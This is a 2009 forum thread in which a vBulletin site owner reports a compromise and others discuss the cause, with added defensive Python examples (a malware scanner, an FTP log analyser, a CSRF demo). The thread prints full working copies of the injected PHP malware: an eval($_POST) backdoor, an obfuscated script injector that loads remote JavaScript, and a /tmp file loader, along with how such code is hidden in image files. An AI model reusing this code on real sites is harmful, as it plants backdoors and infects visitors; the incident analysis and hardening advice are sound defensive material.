HACKED - Make sure you are secure


StructuralNet
04-04-2009, 04:38 AM
Okay guys, I was out at dinner earlier and came back and loaded my site, http://www.theangryforum.com, to see a PHP syntax error on line 1...

I open up my index file and find this:

<?php
// Prepended to index.php: installs an output-buffer hook that injects a base64-encoded
// <script> block into every HTML page, plus an eval() backdoor driven by a POST parameter.
if(!function_exists('tmp_lkojfghx')){
    // Backdoor: whatever arrives in the POST parameter tmp_lkojfghx3 is executed as PHP.
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    // The injected HTML, kept base64-encoded so it does not stand out on a quick look.
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzN1VXY24wY3JHU1ppcHQlMjBGbjdzcmloTGMlM0QlMkYlMkY3VVc5NCUyRTI0MkVpN29MRCUyRTIlMkVRTTMxbjBjOTUlMkZqb0xEcVFNM3VlN1VXcjdVV3lvN0QlMkVqc0ZuNyUzRUdTWiUzQ2loTCUyRlFNM3NjbjBjcjJFaWlwdCUzRScpLnJlcGxhY2UoL283RHxHU1p8aWhMfDdVV3xvTER8Rm43fG4wY3xRTTN8MkVpL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));
    // Output-buffer callback: rewrites the finished page before it is sent to the browser.
    function tmp_lkojfghx($s){
        // Transparently handle gzip-compressed output buffers.
        if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
        // Remove competing injected <script> blocks (long obfuscated strings with eval/fromCharCode/document.write).
        if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
            foreach($a[0] as $v)
                if(count(explode("\n",$v))>5){
                    $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
                    if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
                }
        // Strip an earlier copy of its own payload, then insert it before <body> (or append it).
        $s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
        if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
        elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
        return $g?gzencode($s):$s;
    }
    // Registered as the error handler so the hook is re-armed on every PHP notice or warning
    // (after chaining to the previous handler); it re-stacks existing output buffers under its own.
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
        $s=array();
        if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
        foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
        for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
        ob_start('tmp_lkojfghx');
        for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
    }
}
// Remember any previously registered error handler, then install the hook right away.
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();
?><?php



This was dumped into a crap load of my files. The file permissions were not 777 for these files either, and I do not know how this was injected. My database was not touched, but I had to delete the vB installation, do a fresh install and connect it to the database.

I did some research on this, and results are slim, but it's attacking other programs as well. osCommerce, for example:

http://forums.oscommerce.com/lofiversion/index.php?t321418.html

Anyone see this before?

I was more in a panic to get my site up. Now that I DO have a copy of all of my files and backups, if this hits again I will investigate the source further, possibly copy the whole structure and send it to vB or whatever can be done.
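Added example, not code from the original post: a scanner for the injection pattern shown above. Its indicators are lifted from the posted sample (a first line starting with `<?php if(!function_exists(` that contains `?><?php`, an `eval($_POST[...])` backdoor, a long `base64_decode('...')` literal, the `set_error_handler` + `ob_start` output-buffer hook, an include from /tmp) plus PHP tags inside image files. The web root it scans, and every file in it, is constructed for the demonstration; the base64 payload in the sample is a harmless placeholder, not the real one.

```python
"""Scan a web root for the prepended-PHP injection shown in the post above.

Added example, not code from the thread. Several indicators in one file is the
signal; any single one can occur in legitimate code. Sample files are constructed.
"""
import base64
import binascii
import os
import re
import tempfile

INDICATORS = {
    "post_eval": re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\["),
    "base64_literal": re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{40,})['\"]"),
    "error_handler_hook": re.compile(r"set_error_handler\s*\(\s*['\"]\w+['\"]"),
    "ob_start_callback": re.compile(r"ob_start\s*\(\s*['\"]\w+['\"]"),
    "tmp_include": re.compile(r"is_file\s*\(\s*\$\w+\s*=\s*['\"]/tmp/"),
}
IMAGE_EXTS = (".gif", ".png", ".jpg", ".jpeg")
SCAN_EXTS = (".php", ".inc", ".phtml", ".html", ".htm") + IMAGE_EXTS
PHP_OPEN = re.compile(r"<\?php", re.IGNORECASE)


def decode_payload(b64: str) -> str:
    """Decode a base64 literal for the report; non-printable bytes become '?'."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except binascii.Error:
        return "<not valid base64>"
    text = raw.decode("utf-8", errors="replace")
    return "".join(ch if ch.isprintable() or ch in "\n\t" else "?" for ch in text)


def scan_file(path: str) -> dict:
    """Return {'path', 'hits', 'payload'} for one file."""
    with open(path, "rb") as fh:
        text = fh.read().decode("latin-1")  # byte-transparent; the markers are ASCII
    hits = []
    first_line = text.split("\n", 1)[0].lstrip()
    # The posted sample is one huge line ending in ?><?php, glued in front of the real file.
    if first_line.startswith("<?php if(!function_exists(") and "?><?php" in first_line:
        hits.append("one_line_prepend")
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(text))
    if path.lower().endswith(IMAGE_EXTS) and PHP_OPEN.search(text):
        hits.append("php_in_image")  # a "smilie" that is really a PHP script
    m = INDICATORS["base64_literal"].search(text)
    return {"path": path, "hits": hits, "payload": decode_payload(m.group(1)) if m else None}


def scan_tree(root: str, min_hits: int = 2) -> list:
    """Walk `root`; return results for files with at least `min_hits` indicators."""
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(SCAN_EXTS):
                result = scan_file(os.path.join(dirpath, fn))
                if len(result["hits"]) >= min_hits:
                    flagged.append(result)
    return sorted(flagged, key=lambda r: r["path"])


def build_sample_webroot() -> str:
    """Constructed web root: an injected index.php, a clean include, a PHP-in-GIF smilie."""
    root = tempfile.mkdtemp(prefix="webroot_")
    # Stand-in for the injected <script>; the real payload pointed at a remote host.
    fake_script = base64.b64encode(b"<script>/* constructed payload */</script>").decode()
    injected = (
        "<?php if(!function_exists('tmp_demo')){if(isset($_POST['tmp_demo3']))eval($_POST['tmp_demo3']);"
        "define('TMP_DEMO',base64_decode('" + fake_script + "'));"
        "function tmp_demo($s){return $s.TMP_DEMO;}function tmp_demo2(){ob_start('tmp_demo');}}"
        "@set_error_handler('tmp_demo2');tmp_demo2(); ?><?php\n"
        "<?php\n// the site's real index.php follows\necho 'forum';\n"
    )
    files = {
        "index.php": injected,
        "includes/clean.php": "<?php\n// ordinary code\necho base64_decode('aGVsbG8=');\n",
        "images/smilies/smile.gif": "GIF89a<?php eval($_POST['c']); ?>",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for r in scan_tree(build_sample_webroot()):
        print(r["path"], r["hits"], (r["payload"] or "")[:60])
```

Run it against a copy of the web root taken before cleanup, not the live one, so the evidence survives; the decoded payload tells you where the injected script points, which is what the host needs to block.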

Dismounted
04-04-2009, 05:33 AM
Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

StructuralNet
04-04-2009, 02:41 PM
Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

I am contacting my host right now. I am on a VPS and I have been checking the server logs for anything weird, but I think my admin is better placed to find something, if there is something...

I would have thought, though, that if they got into the server through a backdoor or something, they would have affected my other accounts. I have vB running on another account for another site, and a few other accounts with various programs that were not touched (and have been on there for a very long time).

Here is the list of my mods,

I have ibProArcade v.2.6.8, whose file structure I noticed was changed.

Here is a list of my other mods:

Admin Log In As User

Cyb - Advanced Permissions Based on Post Account

Fake User (adds a couple guests)

GTSmilieBox

Panic Button

Plus Mood

vB Ad Management

vBadvanced CMPS

vbSEO Site Map

Welcome Headers

--------------- Added later ---------------

Maybe someone can chime in?

This guy is getting FTP access. I have formatted all my PCs to make sure I don't have a virus, and my host is looking through everything as well.

Things that caught my interest:


Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c
Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c


Why the arcade first? Compromised maybe? I deleted the folder when I did a backup, I also disabled my FTP server...
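Added example, not code from the original post: the four xferlog lines above show the same remote host downloading a file and re-uploading it one second later, first index.html and then dbclass.php. That download-then-upload pairing is what an attacker with stolen FTP credentials looks like when they fetch a file, prepend their code and push it back. This parser pairs those events per host and file. The four sample lines are the ones quoted above; the fifth is a constructed benign upload so the pairing logic has something to ignore.

```python
"""Pair download/upload events in an xferlog to spot the fetch-modify-push pattern.

Added example, not code from the thread. Field layout is the standard xferlog format:
date (5 fields), transfer time, remote host, size, path, type, action flag, direction,
access mode, user, service, auth method, auth user id, completion status.
"""
from datetime import datetime

# First four lines are quoted from the post above; the last is constructed.
SAMPLE_XFERLOG = """\
Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c
Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c
Sat Apr 04 18:02:10 2009 1 203.0.113.7 81234 /home/theangry/public_html/images/avatars/new.jpg b _ i r theangry ftp 1 * c
"""

CODE_EXTS = (".php", ".phtml", ".inc", ".html", ".htm", ".js", ".htaccess")


def parse_xferlog(text: str) -> list:
    """Parse xferlog lines into dicts; lines with too few fields are skipped."""
    events = []
    for line in text.splitlines():
        t = line.split()  # xferlog writes spaces in filenames as underscores, so split is safe
        if len(t) < 18:
            continue
        events.append({
            "time": datetime.strptime(" ".join(t[0:5]), "%a %b %d %H:%M:%S %Y"),
            "host": t[6],
            "size": int(t[7]),
            "path": t[8],
            "direction": t[11],  # 'o' = client downloaded the file, 'i' = client uploaded it
            "user": t[13],
            "status": t[17],     # 'c' = complete, 'i' = incomplete
        })
    return events


def find_fetch_modify_push(events: list, window_seconds: int = 300) -> list:
    """Return completed uploads that replaced a file the same host downloaded shortly before."""
    last_download = {}  # (host, path) -> most recent download event
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["host"], ev["path"])
        if ev["direction"] == "o":
            last_download[key] = ev
        elif ev["direction"] == "i" and ev["status"] == "c":
            dl = last_download.get(key)
            if dl is None:
                continue
            delta = (ev["time"] - dl["time"]).total_seconds()
            if 0 <= delta <= window_seconds:
                findings.append({
                    "host": ev["host"],
                    "user": ev["user"],
                    "path": ev["path"],
                    "seconds_between": int(delta),
                    "bytes_added": ev["size"] - dl["size"],  # size of the injected code
                    "code_file": ev["path"].lower().endswith(CODE_EXTS),
                })
    return findings


if __name__ == "__main__":
    for f in find_fetch_modify_push(parse_xferlog(SAMPLE_XFERLOG)):
        print(f)
```

The `bytes_added` value is useful on its own: the same attacker tool tends to prepend a payload of roughly constant size, so files that grew by the same amount in the same minute were almost certainly hit by the same script.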

TECK
04-05-2009, 11:28 AM
It is related to your server administration; you did not do anything wrong, and neither did your products...
In short, it is a base64-encoded fake Yahoo counter script that is injected into HTML code. The script looks for files in the server's temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell onto your insecure server.
Personally, I would change host. It is obvious they don't care about security.

StructuralNet
04-05-2009, 07:42 PM
It is related to your server administration; you did not do anything wrong, and neither did your products...
In short, it is a base64-encoded fake Yahoo counter script that is injected into HTML code. The script looks for files in the server's temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell onto your insecure server.
Personally, I would change host. It is obvious they don't care about security.

Yea, I agree with you - because I have been going crazy formatting my machines to make sure I had no key loggers on them, etc.

The host has been working around the clock to find the security hole and try to fix it, so I am going to give him a few days to see if he can close up the hole, if not I am off. I can't have this jeopardize not only my websites on the server, but my clients that I host as well.

Considering it is a VPS, I have multiple accounts on there, including another site for vB... why is this guy going after this site?

TECK
04-06-2009, 08:11 AM
The most common exploit on a dedicated server is a script exploit that gives the hacker non-root access to the server. For example, I could create a file with the extension .gif that is in fact this script:
<?php
// Same hook as the sample earlier in the thread, with two additions: it loads a dropped file
// /tmp/m1 .. /tmp/m99 if one exists, and the injected HTML is a fake "Yahoo! Counter" block.
if(!function_exists('tmp_lkojfghx')){
    define('PMT_knghjg',1);
    // Stage two: include whatever the attacker managed to write to /tmp.
    for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
    // Backdoor: the POST parameter tmp_lkojfghx3 is executed as PHP.
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    // The injected HTML, base64-encoded.
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));
    // Output-buffer callback: removes an earlier copy of the counter block, then inserts it before </body> (or appends it).
    function tmp_lkojfghx($s){
        if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));
        // The base64 below decodes to the regex that matches its own "Yahoo! Counter" block.
        $s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);
        if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);
        elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
        return $g?gzencode($s):$s;
    }
    // Registered as the error handler so the hook is re-armed on every PHP notice or warning
    // (after chaining to the previous handler); it re-stacks existing output buffers under its own.
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
        $s=array();
        if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
        foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
        for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
        ob_start('tmp_lkojfghx');
        for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
    }
}
// Remember any previously registered error handler, then install the hook right away.
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();
?>

It is widely used in smilies, which look like broken images when viewed (the PHP script is executing).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all the files needed to inject the above code into each page on your site. As I said before, change the host. It is not your fault, or the vBulletin developers' fault, if your host runs unsecured boxes.

StructuralNet
04-06-2009, 06:28 PM
The most common exploit on a dedicated server is a script exploit that gives the hacker non-root access to the server. For example, I could create a file with the extension .gif that is in fact this script:
<?php
// Same hook as the sample earlier in the thread, with two additions: it loads a dropped file
// /tmp/m1 .. /tmp/m99 if one exists, and the injected HTML is a fake "Yahoo! Counter" block.
if(!function_exists('tmp_lkojfghx')){
    define('PMT_knghjg',1);
    // Stage two: include whatever the attacker managed to write to /tmp.
    for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
    // Backdoor: the POST parameter tmp_lkojfghx3 is executed as PHP.
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    // The injected HTML, base64-encoded.
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));
    // Output-buffer callback: removes an earlier copy of the counter block, then inserts it before </body> (or appends it).
    function tmp_lkojfghx($s){
        if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));
        // The base64 below decodes to the regex that matches its own "Yahoo! Counter" block.
        $s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);
        if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);
        elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
        return $g?gzencode($s):$s;
    }
    // Registered as the error handler so the hook is re-armed on every PHP notice or warning
    // (after chaining to the previous handler); it re-stacks existing output buffers under its own.
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
        $s=array();
        if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
        foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
        for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
        ob_start('tmp_lkojfghx');
        for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
    }
}
// Remember any previously registered error handler, then install the hook right away.
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();
?>

It is widely used in smilies, which look like broken images when viewed (the PHP script is executing).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all the files needed to inject the above code into each page on your site. As I said before, change the host. It is not your fault, or the vBulletin developers' fault, if your host runs unsecured boxes.

Yea,

I agree - I took your advice and moved - I can't let this sit over my head :erm:

BSMedia
04-06-2009, 07:35 PM
If you're on a VPS, chances are good that security and management rely on you or your server admin.

Your server security is only as secure as your least secure admin/server manager.

mykes
04-08-2009, 11:31 AM
Unfortunately, I don't see how a vb3 site (or many others) can be truly secure at this point.

All a hacker really needs to do is post something like "hey, look at this really awesome thing" with a link to his own server where he controls the HTML and javascripts.

In his HTML there, all he needs is an img tag with src= any url at your vb3 site and he accesses that URL logged in as the unsuspecting user. Stupid browsers send cookies to your site on an img request.

img isn't the only tag, either, script tags work, too, as do css (link) tags, and a few others.
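Added example, not code from the thread or from vBulletin: a simulated state-changing endpoint that shows exactly why the img-tag trick above works against cookie-only authentication and stops working once a per-session token is required. The secret, session id and the cookie/field names (modelled on vBulletin's bbsessionhash cookie and securitytoken form field) are constructed for the demonstration.

```python
"""Cross-site <img src=...> request with and without a CSRF token.

Added example, not code from the thread. The browser attaches the session cookie to
every request, including image loads from another site, so a cookie-only check
accepts the forged request; a token that only the forum's own pages can embed does not.
"""
import hashlib
import hmac

SECRET = b"constructed-server-secret"  # a random per-site value in real deployments


def csrf_token(session_id: str, secret: bytes = SECRET) -> str:
    """Token bound to the session; a page on another origin cannot read or derive it."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def handle_action(cookies: dict, params: dict, sessions: dict, require_token: bool) -> str:
    """State-changing handler (think profile.php?do=updateemail); returns an HTTP status line."""
    user = sessions.get(cookies.get("bbsessionhash"))
    if user is None:
        return "401 not logged in"
    if require_token:
        supplied = params.get("securitytoken", "")
        expected = csrf_token(cookies["bbsessionhash"])
        if not hmac.compare_digest(supplied, expected):  # constant-time comparison
            return "403 bad securitytoken"
    return f"200 {params.get('do')} performed as {user}"


def demo() -> dict:
    sessions = {"sess-abc": "victim"}
    cookies = {"bbsessionhash": "sess-abc"}  # sent by the browser on every request, img loads included
    # Attacker's page: <img src="http://forum/profile.php?do=updateemail&email=attacker@example.com">
    forged = {"do": "updateemail", "email": "attacker@example.com"}
    # The forum's own form carries the token in a hidden field; the attacker's page cannot produce it.
    legit = dict(forged, securitytoken=csrf_token("sess-abc"))
    return {
        "forged_without_csrf": handle_action(cookies, forged, sessions, require_token=False),
        "forged_with_csrf": handle_action(cookies, forged, sessions, require_token=True),
        "legit_with_csrf": handle_action(cookies, legit, sessions, require_token=True),
    }


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: {status}")
```

The token only helps if every state-changing request checks it; a mod that adds its own action handler without the check is exactly the hole the next posts describe.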

Dismounted
04-09-2009, 04:06 AM
That's why vBulletin introduced CSRF protection. ;)

mykes
04-09-2009, 11:17 AM
That's why vBulletin introduced CSRF protection. ;)

Indeed. It's a good reason to always keep your vb3 up to date, version-wise (to get these kinds of fixes). Though installed hacks and mods that don't have CSRF protection built in are giant security holes.

Two mods I'd love to see, but haven't found here are:

1) Allow trusted users (e.g. by user group) to post HTML in forums. Right now, you can turn on HTML in one or more forums, but globally for all users.
2) Fix the HTML posting so it strips out script tags and other potentially malicious things (img with src=something.php?args - get rid of ?args)

Dismounted
04-09-2009, 11:52 AM
img with src=something.php?args - get rid of ?args
vBulletin already allows for this, inside vBulletin Options.

StructuralNet
04-09-2009, 06:56 PM
I guess the same would go with this code then? Looks like an
<html><body><script>alert('SwZNd');</script></body></html>


I found that in a PNG file on one of my clients accounts, along with a .zip file and a full directory of helpdesk software, along with a new database for that program.

Dismounted
04-10-2009, 03:44 AM
Anything that looks like that generally isn't good. ;)

StructuralNet
04-10-2009, 10:42 AM
Anything that looks like that generally isn't good. ;)

Yuppp... I found that in a PNG file on two of my clients' sites. Their sites have been running well over a year now with no problem, but as soon as I changed hosts it hit the fan. One of the programs installed a helpdesk on their account, and even had access to MySQL.

What does that code do, pretty much the same as above? Access a file in tmp to get unrooted access?

Dumped that host like it's hot.

Dismounted
04-10-2009, 11:25 AM
The code above doesn't do anything. It's just "test" script.

StructuralNet
04-10-2009, 01:39 PM
The code above doesn't do anything. It's just "test" script.

Well, somehow that image and that helpdesk were installed on the same day... That site was open for at least a year - 2 weeks after I moved to a new host is when my vB forum got hacked and my clients' sites were hacked...

No security at all apparently..

|Jordan|
04-12-2009, 05:19 AM
How do you secure the tmp dir ? chown it?

Angel-Wings
04-12-2009, 07:45 PM
How do you secure the tmp dir ? chown it?

Simple answer - use a different temp dir than the default /tmp one, chown / chmod that one and make sure anything active (PHP, SSI) isn't active there.
Related to the VPS issue and the "It's up to you" statement - that's only partially right. VPSes run inside a virtual environment, and if the hoster doesn't care about security updates it's possible - hard but possible - to break out from a VPS onto the real server, and from there, well, you can do everything.
Back to the "tmp dir" - set in php.ini a tempdir, outside the webroot of course and ensure your Webserver doesn't serve that directory.
And related to this base64 - I highly recommend reading some manuals about a "secure as possible" PHP setup. Just because it's set in the default php.ini, it doesn't mean it's good to be kept ;)

|Jordan|
04-13-2009, 02:58 AM
Simple answer - use a different temp dir than the default /tmp one, chown / chmod that one and make sure anything active (PHP, SSI) isn't active there.
Related to the VPS issue and the "It's up to you" statement - that's only partially right. VPSes run inside a virtual environment, and if the hoster doesn't care about security updates it's possible - hard but possible - to break out from a VPS onto the real server, and from there, well, you can do everything.
Back to the "tmp dir" - set in php.ini a tempdir, outside the webroot of course and ensure your Webserver doesn't serve that directory.
And related to this base64 - I highly recommend reading some manuals about a "secure as possible" PHP setup. Just because it's set in the default php.ini, it doesn't mean it's good to be kept ;)

Chown it as a different user other than root?

Dismounted
04-13-2009, 04:37 AM
Chown it as a different user other than root?
Ideally, a user just dedicated to PHP (with locked down permissions). Also have a look at upload_tmp_dir (you may want to change this as well, although it is not necessary).

Brother Malachi
04-20-2009, 08:11 PM
Sorry for reviving this old thread but how can I know if my site is compromised?

tipoboy
04-20-2009, 09:48 PM
Sorry for reviving this old thread but how can I know if my site is compromised?

Usually, if you keep your bulletin board up to date, you're pretty safe.

Dismounted
04-21-2009, 09:17 AM
You don't really know until it's too late. However, as mentioned above, keeping your software as up to date as possible will reduce this risk.

Brother Malachi
04-21-2009, 11:33 PM
What about the tmp folder?

Dismounted
04-22-2009, 06:55 AM
What about it? As long as you keep PHP's temp directory secured, you should be fine.

Brother Malachi
04-22-2009, 08:19 PM
What I meant was how do I know if the /tmp/ folder is not secured?

TECK
05-01-2009, 02:33 AM
How do you secure the tmp dir ? chown it?

The hacker does not use a /tmp dir to hack your forum. He takes advantage of your 0777-chmoded dirs in vB to screw you nice.
I posted this issue a long time ago but people thought I'm crazy. I even wrote a tutorial on this site on how to secure vB... Put it this way: you have a 0777 dir in your /var/www/html (or whatever is the web root)? You can be hacked, very easily.

Read this article (https://vborg.vbsupport.ru/showthread.php?t=148209) I wrote a long time ago... probably nobody read it.
Then secure the current 0777 dirs the same way, not just the config file. Chmod them to 0750 and have them owned by nologinuser:root.
